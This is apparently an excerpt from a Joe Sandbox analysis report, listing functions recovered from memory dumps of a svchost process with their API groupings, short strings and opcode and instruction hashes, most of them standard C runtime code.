                                                        • Opcode Fuzzy Hash: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
                                                        • Instruction Fuzzy Hash: 6D419033218B80DAE761CFA1E4857AFB7A1F389B99F049119DA8E47758DF3AC445CB40
                                                        Function 000001CBD8BDD068 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 54COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        • FlsGetValue.KERNEL32(?,?,?,000001CBD8BDC7DE,?,?,?,?,?,?,?,?,000001CBD8BDCF9D,?,?,00000001), ref: 000001CBD8BDD087
                                                        • FlsSetValue.KERNEL32(?,?,?,000001CBD8BDC7DE,?,?,?,?,?,?,?,?,000001CBD8BDCF9D,?,?,00000001), ref: 000001CBD8BDD0A6
                                                        • FlsSetValue.KERNEL32(?,?,?,000001CBD8BDC7DE,?,?,?,?,?,?,?,?,000001CBD8BDCF9D,?,?,00000001), ref: 000001CBD8BDD0CE
                                                        • FlsSetValue.KERNEL32(?,?,?,000001CBD8BDC7DE,?,?,?,?,?,?,?,?,000001CBD8BDCF9D,?,?,00000001), ref: 000001CBD8BDD0DF
                                                        • FlsSetValue.KERNEL32(?,?,?,000001CBD8BDC7DE,?,?,?,?,?,?,?,?,000001CBD8BDCF9D,?,?,00000001), ref: 000001CBD8BDD0F0
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000044.00000002.2797545530.000001CBD8BD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CBD8BD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_68_2_1cbd8bd0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: Value
                                                        • String ID: 1%$Y%
                                                        • API String ID: 3702945584-1395475152
                                                        • Opcode ID: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
                                                        • Instruction ID: 71d4662aedf6dbd697b56d36903d8f4ddc6a5a38ef4483e9cb1097fa8a6fd393
                                                        • Opcode Fuzzy Hash: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
                                                        • Instruction Fuzzy Hash: 8311933038D34052FA6457F599D3BF92243DB843A9F185624586FC67E5DF1BC401C280
                                                        Function 000001CBD8BD7510 Relevance: 12.2, APIs: 8, Instructions: 230COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000044.00000002.2797545530.000001CBD8BD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CBD8BD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_68_2_1cbd8bd0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                        • String ID:
                                                        • API String ID: 190073905-0
                                                        • Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                        • Instruction ID: 0106aeadf5537429d751d842193ee5b2217affcef9ad2f21424a8c74e39b0775
                                                        • Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                        • Instruction Fuzzy Hash: EE8105B068C701AAFA519BE594C3FF92692E74578EF144425990FC7796EB3BC403C788
                                                        Function 000001CBD8BD9DC4 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000044.00000002.2797545530.000001CBD8BD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CBD8BD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_68_2_1cbd8bd0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: Library$Load$AddressErrorFreeLastProc
                                                        • String ID: api-ms-
                                                        • API String ID: 2559590344-2084034818
                                                        • Opcode ID: 57a387126f3cdca2e6377dd9e1e04e2dfecb224b041c0cba2ac35bf939624b8e
                                                        • Instruction ID: c9b8f5ea63e900bb7e76ad3c81d051b3b44ab0de19cb25040923075a332a8adb
                                                        • Opcode Fuzzy Hash: 57a387126f3cdca2e6377dd9e1e04e2dfecb224b041c0cba2ac35bf939624b8e
                                                        • Instruction Fuzzy Hash: A731F63124A700F6FE169BC2A481BF522D5B748BAAF1906259D2F87791DF3BC459C380
                                                        Function 000001CBD8BE3DB4 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000044.00000002.2797545530.000001CBD8BD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CBD8BD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_68_2_1cbd8bd0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                        • String ID: CONOUT$
                                                        • API String ID: 3230265001-3130406586
                                                        • Opcode ID: ea8503a65e9befc0d33d9332805196394b6329e0df61646a9863ad39bb9ae76f
                                                        • Instruction ID: eb7377fe2b6302bf55bf176071237aa04aac1f273150e96e86d659a293cea9b9
                                                        • Opcode Fuzzy Hash: ea8503a65e9befc0d33d9332805196394b6329e0df61646a9863ad39bb9ae76f
                                                        • Instruction Fuzzy Hash: 5D115131258B408AF7528BD2E895B6977A0F789FEAF044214EA6FC7794CB3BC514C780
                                                        Function 000001CBD8BD3790 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 44COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000044.00000002.2797545530.000001CBD8BD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CBD8BD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_68_2_1cbd8bd0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: CurrentProcessProtectVirtual$HandleModule
                                                        • String ID: wr
                                                        • API String ID: 1092925422-2678910430
                                                        • Opcode ID: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
                                                        • Instruction ID: 59217231f7a3652f0728cb9fcaba971148e9c2b568802b1bfc5c67614d1d01f2
                                                        • Opcode Fuzzy Hash: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
                                                        • Instruction Fuzzy Hash: D111AC36748B408AFF158BD1E085AA962A1F789B8AF040028DE8F87756EF3FC504C744
                                                        Function 000001CBD8BD5B30 Relevance: 9.2, APIs: 6, Instructions: 240threadCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000044.00000002.2797545530.000001CBD8BD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CBD8BD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_68_2_1cbd8bd0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: Thread$Current$Context
                                                        • String ID:
                                                        • API String ID: 1666949209-0
                                                        • Opcode ID: 542e600666cb1ac52823d1f72aa5ca11f47e3ee1f4dc73a6c07a176fbafbfe1c
                                                        • Instruction ID: 2535d574b1785d2b1a42f984cfa41e71c2a54c3512dbc8327d59fc37f128c4a0
                                                        • Opcode Fuzzy Hash: 542e600666cb1ac52823d1f72aa5ca11f47e3ee1f4dc73a6c07a176fbafbfe1c
                                                        • Instruction Fuzzy Hash: 93D1BE76249B4891EA70DB86E4917AE77B1F388B89F100116EACF87B65CF7EC541CB40
                                                        Function 000001CBD8BD2F04 Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 93memoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000044.00000002.2797545530.000001CBD8BD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CBD8BD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_68_2_1cbd8bd0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: Heap$Process$AllocFree
                                                        • String ID: dialer
                                                        • API String ID: 756756679-3528709123
                                                        • Opcode ID: 2e24de9146afbba5105044d4fd5602f1f9f0ed558a5ed62472976580c3eaf0ad
                                                        • Instruction ID: 1cba4eec41f719f4423791475f4ed57158e1c05105fd208c51b5bbf463187363
                                                        • Opcode Fuzzy Hash: 2e24de9146afbba5105044d4fd5602f1f9f0ed558a5ed62472976580c3eaf0ad
                                                        • Instruction Fuzzy Hash: 77311532349B5096F611CFD6E581BBA6395FB44B8AF0844209E4F83B5AEF37D460C380
                                                        Function 000001CBD8BDCFA0 Relevance: 9.1, APIs: 6, Instructions: 57COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000044.00000002.2797545530.000001CBD8BD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CBD8BD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_68_2_1cbd8bd0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: Value$ErrorLast
                                                        • String ID:
                                                        • API String ID: 2506987500-0
                                                        • Opcode ID: 4f148fb448054b99fdb5313590ff83f86fc6d8762bc770a772f95ba4b575ef67
                                                        • Instruction ID: 537801d7384df499510b0516e733ebe0744c8f24ed2dd7c99d327c711a9b615e
                                                        • Opcode Fuzzy Hash: 4f148fb448054b99fdb5313590ff83f86fc6d8762bc770a772f95ba4b575ef67
                                                        • Instruction Fuzzy Hash: B2116F3028D34062FA2557F195D3BF92253AB847BEF141724A86FC67E6DF2BC401C280
                                                        Function 000001CBD8BD199C Relevance: 9.0, APIs: 6, Instructions: 42stringCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000044.00000002.2797545530.000001CBD8BD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CBD8BD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_68_2_1cbd8bd0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                        • String ID:
                                                        • API String ID: 517849248-0
                                                        • Opcode ID: 01214db588610ff501214a343c1506f8e4016efad0e64bbd234dc336c45f59d3
                                                        • Instruction ID: 4e1a75a037d890f7a3af027752f69dd1f5d83a83d0a6e2d613213ff947cde410
                                                        • Opcode Fuzzy Hash: 01214db588610ff501214a343c1506f8e4016efad0e64bbd234dc336c45f59d3
                                                        • Instruction Fuzzy Hash: 80018E31348B408AF611CBD2A488BAA63A1F749BCAF444035DE5E83754DF3AC589C380
                                                        Function 000001CBD8BD36C8 Relevance: 9.0, APIs: 6, Instructions: 38threadCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000044.00000002.2797545530.000001CBD8BD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CBD8BD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_68_2_1cbd8bd0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                                                        • String ID:
                                                        • API String ID: 449555515-0
                                                        • Opcode ID: 4c9ec6165d8c5af47ee19c29b3e549fd6cc17b885c385019f049dc0dac4977bc
                                                        • Instruction ID: 7f1ef5d5059ce12c61f5d97a27b9455fb86792ee4b09ca0f56259de58aeb52b2
                                                        • Opcode Fuzzy Hash: 4c9ec6165d8c5af47ee19c29b3e549fd6cc17b885c385019f049dc0dac4977bc
                                                        • Instruction Fuzzy Hash: 6D016574659B408AFB259BD1E48ABA567A1B749B8BF040425CD4F87765EF3FC104C740
                                                        Function 000001CBD8BD9005 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 135COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000044.00000002.2797545530.000001CBD8BD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CBD8BD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_68_2_1cbd8bd0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                        • String ID: csm$f
                                                        • API String ID: 2395640692-629598281
                                                        • Opcode ID: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                        • Instruction ID: 4c990827edacdc3879a7cb4c8e50599e697146fcddd6f7e908c96fcc5a92b3c1
                                                        • Opcode Fuzzy Hash: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                        • Instruction Fuzzy Hash: 1B517D32649701AAFB149B95E48AFBA27D7F345B9EF119124DA1F83748EB37D840C780
                                                        Function 000001CBD8BD8FE8 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 75COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000044.00000002.2797545530.000001CBD8BD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CBD8BD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_68_2_1cbd8bd0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                        • String ID: csm$f
                                                        • API String ID: 2395640692-629598281
                                                        • Opcode ID: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                        • Instruction ID: 5b401db059e9ca29837f15a6baad8a1f4cd991064a946fc7a0a4d37f863a2710
                                                        • Opcode Fuzzy Hash: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                        • Instruction Fuzzy Hash: F9318E31248740AAF714DF91E886BBA37A6F344B8EF058124AE4F83745DB3BD940C784
                                                        Function 000001CBD8BD1A40 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 30stringCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000044.00000002.2797545530.000001CBD8BD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CBD8BD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_68_2_1cbd8bd0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: FinalHandleNamePathlstrlen
                                                        • String ID: \\?\
                                                        • API String ID: 2719912262-4282027825
                                                        • Opcode ID: c1daab9146f2a1614ef605d22fd4f721266e20aa8a0235322e79b2424596649d
                                                        • Instruction ID: b74828290f2ae62677b66e179717fd8b661321355523e7ba451828796880c1a7
                                                        • Opcode Fuzzy Hash: c1daab9146f2a1614ef605d22fd4f721266e20aa8a0235322e79b2424596649d
                                                        • Instruction Fuzzy Hash: DBF0813234874096F7208BE4E8C5BA96361F748B9DF845020CA4E86954DB2FC64DCB40
                                                        Function 000001CBD8BDBC98 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000044.00000002.2797545530.000001CBD8BD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CBD8BD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_68_2_1cbd8bd0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: AddressFreeHandleLibraryModuleProc
                                                        • String ID: CorExitProcess$mscoree.dll
                                                        • API String ID: 4061214504-1276376045
                                                        • Opcode ID: 0f45d19500fbd6816ab24c8a126c5dacde8056cea587c59ff890217df17fdf5d
                                                        • Instruction ID: 37321554d2df0aa79fc22873e2386afc887469eaa0481ba7fb1d3ff3d9e834d8
                                                        • Opcode Fuzzy Hash: 0f45d19500fbd6816ab24c8a126c5dacde8056cea587c59ff890217df17fdf5d
                                                        • Instruction Fuzzy Hash: C0F0AF7125970489FB118FE4E4C6BB92321EB8977AF4402198A6F851E4CF2BC049C780
                                                        Function 000001CBD8BD3044 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 27COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000044.00000002.2797545530.000001CBD8BD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CBD8BD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_68_2_1cbd8bd0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: CombinePath
                                                        • String ID: \\.\pipe\
                                                        • API String ID: 3422762182-91387939
                                                        • Opcode ID: 8c685e1f0b85bfe06f91eeefbd03c12bff8419d51c8b157116edbf6ca1c9c829
                                                        • Instruction ID: 3c5f480dda9202fff783b6f139fd1f0141ab971eaac63cb1c0237ba01f6de79c
                                                        • Opcode Fuzzy Hash: 8c685e1f0b85bfe06f91eeefbd03c12bff8419d51c8b157116edbf6ca1c9c829
                                                        • Instruction Fuzzy Hash: A2F0543068878085FA144BD6B9955A56261AB49FD6F084120DD4F87B15DF2AC445C740
                                                        Function 000001CBD8BD50D0 Relevance: 7.8, APIs: 5, Instructions: 318threadCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000044.00000002.2797545530.000001CBD8BD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CBD8BD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_68_2_1cbd8bd0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: CurrentThread
                                                        • String ID:
                                                        • API String ID: 2882836952-0
                                                        • Opcode ID: e13ad259af2044a9722e5c88be2fea28068701e2040856c8b7ebe2328a6e9181
                                                        • Instruction ID: 32d60e69eea9e2b2788f8227f4ad6006050a75537e6b2dfa38ae953cf35e1181
                                                        • Opcode Fuzzy Hash: e13ad259af2044a9722e5c88be2fea28068701e2040856c8b7ebe2328a6e9181
                                                        • Instruction Fuzzy Hash: 2902E83225DB8486E760CB95E4917AEB7A1F3C4789F101015EA8F87BA9DFBEC444CB40
                                                        Function 000001CBD8BD5710 Relevance: 7.6, APIs: 5, Instructions: 124threadCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000044.00000002.2797545530.000001CBD8BD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CBD8BD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_68_2_1cbd8bd0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: CurrentThread
                                                        • String ID:
                                                        • API String ID: 2882836952-0
                                                        • Opcode ID: b02f694671304b5a077fe24bce3094f0c3b02718cee177a37b7a7da192a85efa
                                                        • Instruction ID: 9c1493acfd7b5872a94b8db0ae71fae0010280c453ccaf9609f860de902d1b3d
                                                        • Opcode Fuzzy Hash: b02f694671304b5a077fe24bce3094f0c3b02718cee177a37b7a7da192a85efa
                                                        • Instruction Fuzzy Hash: 9C61F83655DB40C6F7608B95E485BAE77A1F388789F105116EA9F87BA8CBBFC440CB40
                                                        Function 000001CBD8BB3504 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000044.00000002.2797368279.000001CBD8BA0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CBD8BA0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_68_2_1cbd8ba0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: _set_statfp
                                                        • String ID:
                                                        • API String ID: 1156100317-0
                                                        • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                        • Instruction ID: 62decd75e8cd862665d9d8c7f09f2ea4bdb99cc7548c456523e92675cecc9a33
                                                        • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                        • Instruction Fuzzy Hash: 2511C4726DCB0151FA5411E8E6D3BF910C06B5CB7EF484638A96F862F78B27F848C180
                                                        Function 000001CBD8BE4104 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000044.00000002.2797545530.000001CBD8BD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CBD8BD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_68_2_1cbd8bd0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: _set_statfp
                                                        • String ID:
                                                        • API String ID: 1156100317-0
                                                        • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                        • Instruction ID: f252b24e3e3f9fbba2903bc14e13e79b0561aa045f8524dcd908ab4369d06102
                                                        • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                        • Instruction Fuzzy Hash: 1D118232A98F5019FE6615E8D4D7FF619417B683AEF080624A57FC66D68B2BC841C182
                                                        Function 000001CBD8BAF040 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 182COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000044.00000002.2797368279.000001CBD8BA0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CBD8BA0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_68_2_1cbd8ba0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: _invalid_parameter_noinfo
                                                        • String ID: Tuesday$Wednesday$or copy constructor iterator'
                                                        • API String ID: 3215553584-4202648911
                                                        • Opcode ID: 9e57f18f61c22f0406784eb273be7b0d6046b42052b72e443b30de0c50228f55
                                                        • Instruction ID: 99ebee8ea45fe0a9786a9c4ed11dd03fcaa3952423eabe6646d82df20e5116f7
                                                        • Opcode Fuzzy Hash: 9e57f18f61c22f0406784eb273be7b0d6046b42052b72e443b30de0c50228f55
                                                        • Instruction Fuzzy Hash: 7061C23668C30042FA658BE5E5C3BFE6EA0E78178EF544515DA0F937A4DBB7C841C288
                                                        Function 000001CBD8BDAA1C Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 147COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000044.00000002.2797545530.000001CBD8BD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CBD8BD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_68_2_1cbd8bd0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: CallEncodePointerTranslator
                                                        • String ID: MOC$RCC
                                                        • API String ID: 3544855599-2084237596
                                                        • Opcode ID: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                        • Instruction ID: 7acbc2e4e8793f3fe0f44b886d3766375e5a85e830d565591bd1b1d9b19824ab
                                                        • Opcode Fuzzy Hash: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                        • Instruction Fuzzy Hash: A5618936608B849AFB109FA5D481BED7BA2F344B8DF045205EE4F57B98DB3AC095C780
                                                        Function 000001CBD8BAA178 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 145COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000044.00000002.2797368279.000001CBD8BA0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CBD8BA0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_68_2_1cbd8ba0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                        • String ID: csm$csm
                                                        • API String ID: 3896166516-3733052814
                                                        • Opcode ID: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                        • Instruction ID: fd0772b57a10f5ee3d03dfca06ca8f8fdafda8dc318c2fb514941a215750b28d
                                                        • Opcode Fuzzy Hash: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                        • Instruction Fuzzy Hash: 7151D236188380CAFB648BD59081BBC77A0F355B8AF046116DA5FC7B95CBBBC450C798
                                                        Function 000001CBD8BDAD78 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 145COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000044.00000002.2797545530.000001CBD8BD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CBD8BD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_68_2_1cbd8bd0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                        • String ID: csm$csm
                                                        • API String ID: 3896166516-3733052814
                                                        • Opcode ID: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                        • Instruction ID: 0c549113169c63b82f4eb0439e5f8d0fded427d2edf7ff314c8146e84b243ff3
                                                        • Opcode Fuzzy Hash: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                        • Instruction Fuzzy Hash: 02518E721483809BFB748BE190C5BA97BA2E354B8AF146115DA5FC7AD5CB3BD450C780
                                                        Function 000001CBD8BA8405 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 135COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000044.00000002.2797368279.000001CBD8BA0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CBD8BA0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_68_2_1cbd8ba0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: CurrentImageNonwritable__except_validate_context_record
                                                        • String ID: csm$f
                                                        • API String ID: 3242871069-629598281
                                                        • Opcode ID: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                        • Instruction ID: 7dda59274c03c3fa635dd33b5e12994a731da3bfc9d46b6666e8b71b45b3c75c
                                                        • Opcode Fuzzy Hash: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                        • Instruction Fuzzy Hash: 73519132649B008AFB54CBD6E485FA83795F354B9DF508124DE1B83B58EBB7E840C788
                                                        Function 000001CBD8BA83E8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 75COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000044.00000002.2797368279.000001CBD8BA0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CBD8BA0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_68_2_1cbd8ba0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: CurrentImageNonwritable__except_validate_context_record
                                                        • String ID: csm$f
                                                        • API String ID: 3242871069-629598281
                                                        • Opcode ID: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                        • Instruction ID: d574a5838cee0a89f3f3a63565909bfd7782941e71e265548c8e5aea6bd2b172
                                                        • Opcode Fuzzy Hash: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                        • Instruction Fuzzy Hash: 6F318D31249B409AF714DF92E886BA937A4F340B8EF058014EE5F83B94DB7BD940C788
                                                        Function 000001CBD8BE2058 Relevance: 6.3, APIs: 4, Instructions: 299fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000044.00000002.2797545530.000001CBD8BD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CBD8BD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_68_2_1cbd8bd0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: FileWrite$ConsoleErrorLastOutput
                                                        • String ID:
                                                        • API String ID: 2718003287-0
                                                        • Opcode ID: 3a35214534a53fd0655822596b90f4932f5655332a96a267e8fac8abb8670521
                                                        • Instruction ID: f20432c764ec1e0b106a42a51970bf11a474d24c72dd99a7e8f550ff0ed66ca1
                                                        • Opcode Fuzzy Hash: 3a35214534a53fd0655822596b90f4932f5655332a96a267e8fac8abb8670521
                                                        • Instruction Fuzzy Hash: E4D1BC72758B808DF712CBE9D481AEC3BB5E354799F004216EE5E97B99DB36C506C380
                                                        Function 000001CBD8BD14A4 Relevance: 6.3, APIs: 5, Instructions: 38memoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000044.00000002.2797545530.000001CBD8BD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CBD8BD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_68_2_1cbd8bd0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: Heap$Process$Free
                                                        • String ID:
                                                        • API String ID: 3168794593-0
